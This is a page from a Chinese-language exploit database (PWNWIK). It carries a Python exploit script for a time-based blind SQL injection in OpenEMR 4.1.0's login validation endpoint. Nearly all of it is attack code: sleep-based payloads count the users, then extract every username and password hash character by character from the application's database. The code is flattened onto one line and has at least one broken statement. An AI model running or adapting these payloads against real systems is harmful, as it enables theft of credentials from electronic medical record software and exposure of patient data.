PWNWIK.COM==免费、自由、人人可编辑的漏洞库
,
EXP
# Exploit Title: OpenEMR 4.1.0 - 'u' SQL Injection # Date: 2021-04-03 # Exploit Author: Michael Ikua # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://github.com/openemr/openemr/archive/refs/tags/v4_1_0.zip # Version: 4.1.0 # Original Advisory: https://www.netsparker.com/web-applications-advisories/sql-injection-vulnerability-in-openemr/ #!/usr/bin/env python3 import requests import string import sys print(""" ____ ________ _______ __ __ ___ ____ / __ \____ ___ ____ / ____/ |/ / __ \ / // / < // __ \\ / / / / __ \/ _ \/ __ \/ __/ / /|_/ / /_/ / / // /_ / // / / / / /_/ / /_/ / __/ / / / /___/ / / / _, _/ /__ __/ / // /_/ / \____/ .___/\___/_/ /_/_____/_/ /_/_/ |_| /_/ (_)_(_)____/ /_/ ____ ___ __ _____ ____ __ _ / __ )/ (_)___ ____/ / / ___// __ \ / / (_) / /_/ / / / __ \/ __ / \__ \/ / / / / / / / / /_/ / / / / / / /_/ / ___/ / /_/ / / /___/ / /_____/_/_/_/ /_/\__,_/ /____/\___\_\/_____/_/ exploit by @ikuamike """) all = string.printable # edit url to point to your openemr instance url = "http://192.168.56.106/openemr/interface/login/validateUser.php?u=" def extract_users_num(): print("+ Finding number of users...") for n in range(1,100): payload = '\'%2b(SELECT+if((select count(username) from users)=' + str(n) + ',sleep(3),1))%2b\'' r = requests.get(url+payload) if r.elapsed.total_seconds() > 3: user_length = n break print("+ Found number of users: " + str(user_length)) return user_length def extract_users(): users = extract_users_num() print("+ Extracting username and password hash...") output = for n in range(1,1000): payload = '\'%2b(SELECT+if(length((select+group_concat(username,\':\',password)+from+users+limit+0,1))=' + str(n) + ',sleep(3),1))%2b\'' #print(payload) r = requests.get(url+payload) #print(r.request.url) if r.elapsed.total_seconds() > 3: length = n break for i in range(1,length+1): for char in all: payload = '\'%2b(SELECT+if(ascii(substr((select+group_concat(username,\':\',password)+from+users+limit+0,1),'+ str(i)+',1))='+str(ord(char))+',sleep(3),1))%2b\'' #print(payload) r = requests.get(url+payload) #print(r.request.url) if r.elapsed.total_seconds() > 3: output.append(char) if char == ",": print("") continue print(char, end='', flush=True) try: extract_users() except KeyboardInterrupt: print("") print("+ Exiting...") sys.exit()
免费、自由、人人可编辑的漏洞库